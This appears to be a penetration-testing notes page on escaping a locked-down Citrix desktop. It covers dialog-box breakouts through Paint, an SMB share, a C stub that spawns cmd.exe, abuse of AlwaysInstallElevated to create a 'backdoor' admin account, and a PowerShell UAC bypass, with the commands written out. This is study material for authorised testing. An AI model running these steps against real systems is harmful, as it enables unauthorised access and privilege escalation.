> For the complete documentation index, see [llms.txt](https://0xss0rz.gitbook.io/0xss0rz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/citrix-breakout.md).

# Citrix Breakout

## Install Citrix Receiver

{% embed url="<https://docs.citrix.com/en-us/citrix-workspace-app-for-linux/install.html>" %}

Download Debian package

{% embed url="<https://www.citrix.com/downloads/workspace-app/linux/workspace-app-for-linux-latest.html>" %}

```
osboxes@osboxes:~/Downloads$ sudo chmod 644 icaclient_24.5.0.76_amd64.deb
osboxes@osboxes:~/Downloads$ sudo apt install -f ./icaclient_24.5.0.76_amd64.deb
```

If "Network data corrupted - HDX has detected corrupted server data, session can not continue":

<figure><img src="/files/8LQHPnopGKJ00CgpSztv" alt=""><figcaption></figcaption></figure>

Use an older Citrix receiver version:

```
$ wget https://deb.gymkirchenfeld.ch/pool/main/i/icaclient/icaclient_23.5.0.58_amd64.deb
$ sudo chmod 644 icaclient_23.5.0.58_amd64.deb
$ sudo dpkg -i /home/osboxes/Downloads/icaclient_23.5.0.58_amd64.deb
```

{% embed url="<https://askubuntu.com/questions/1519368/citrix-icaclient-hdx-has-detected-corrupted-server-data-session-can-not-continue>" %}

## Breakout

Features like Save, Save As, Open, Load, Browse, Import, Export, Help, Search, Scan, and Print, usually provide an attacker with an opportunity to invoke a Windows dialog box. There are multiple ways to open dialog box in windows using tools such as Paint, Notepad, Wordpad, etc.

### With Paint

Run `Paint` from start menu and click on `File > Open` to open the Dialog Box.

<figure><img src="/files/AVsgiNsXbBmQj6X7g6BY" alt=""><figcaption></figcaption></figure>

With the windows dialog box open for paint, we can enter the [UNC](https://learn.microsoft.com/en-us/dotnet/standard/io/file-path-formats#unc-paths) path `\\127.0.0.1\c$\users\pmorgan` under the File name field, with File-Type set to `All Files` and upon hitting enter we gain access to the desired directory.

### Create .bat file

{% embed url="<https://0xdf.gitlab.io/2020/06/17/endgame-xen.html>" %}

## Accessing SMB share from restricted environment

```shell-session
smbserver.py -smb2support share $(pwd)
```

<figure><img src="/files/E2obhJISGJmsZLd0t4t9" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/hxFc9EenGfDpVBZF5m8v" alt=""><figcaption></figcaption></figure>

&#x20;Right-click on the `pwn.exe` binary and select `Open`, which should prompt us to run it and a cmd console will be opened.

pwn.exe:

```c
#include <stdlib.h>
int main() {
  system("C:\\Windows\\System32\\cmd.exe");
}
```

{% embed url="<https://explorerplusplus.com/>" %}

`Explorer++` to copy files from the `\\10.13.38.95\share` location to the Desktop belonging to the user `pmorgan`.

Being a portable application, it can be executed directly without the need for installation

## Alternate Registry Editors

&#x20;Alternative Registry editors can be employed to bypass the standard group policy restrictions. [Simpleregedit](https://sourceforge.net/projects/simpregedit/), [Uberregedit](https://sourceforge.net/projects/uberregedit/) and [SmallRegistryEditor](https://sourceforge.net/projects/sre/) are examples of such GUI tools

## Modify existing shortcut file

```
C:\Windows\System32\cmd.exe
```

<figure><img src="/files/SGLxtw38wQyPvxhXA37g" alt=""><figcaption></figcaption></figure>

Other options: transfer an existing shortcut file using an SMB server. Alternatively, we can create a new shortcut file using PowerShell

## Script Execution

1. Create a new text file and name it "evil.bat".
2. Open "evil.bat" with a text editor such as Notepad.
3. Input the command "cmd" into the file.&#x20;

<figure><img src="/files/GrdMS4Cm6csmM2aL1cZM" alt=""><figcaption></figcaption></figure>

## Escalating Privileges

WinPeas or PowerUp -> **AlwaysInstallElevated**

{% content-ref url="/pages/nW6AIgxt7tsfhiB8iOTQ" %}
[Miscellaneous Techniques](/0xss0rz/pentest/privilege-escalation/windows/miscellaneous-techniques.md)
{% endcontent-ref %}

```cmd-session
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
		AlwaysInstallElevated    REG_DWORD    0x1


C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
		AlwaysInstallElevated    REG_DWORD    0x1
```

```powershell-session
PS C:\Users\pmorgan\Desktop> Import-Module .\PowerUp.ps1
PS C:\Users\pmorgan\Desktop> Write-UserAddMSI
	
Output Path
-----------
UserAdd.msi
```

<figure><img src="/files/ogY4OFV8gxOf67cSEDYF" alt=""><figcaption></figcaption></figure>

```cmd-session
C:\> runas /user:backdoor cmd

Enter the password for backdoor: T3st@123
Attempting to start cmd as user "VDESKTOP3\backdoor" ...
```

## Bypass UAC

```cmd-session
C:\Windows\system32> cd C:\Users\Administrator

Access is denied.
```

```powershell-session
PS C:\Users\Public> Import-Module .\Bypass-UAC.ps1
PS C:\Users\Public> Bypass-UAC -Method UacMethodSysprep
```

<figure><img src="/files/rLhGT4kOnH14vCG0nLDj" alt=""><figcaption></figcaption></figure>
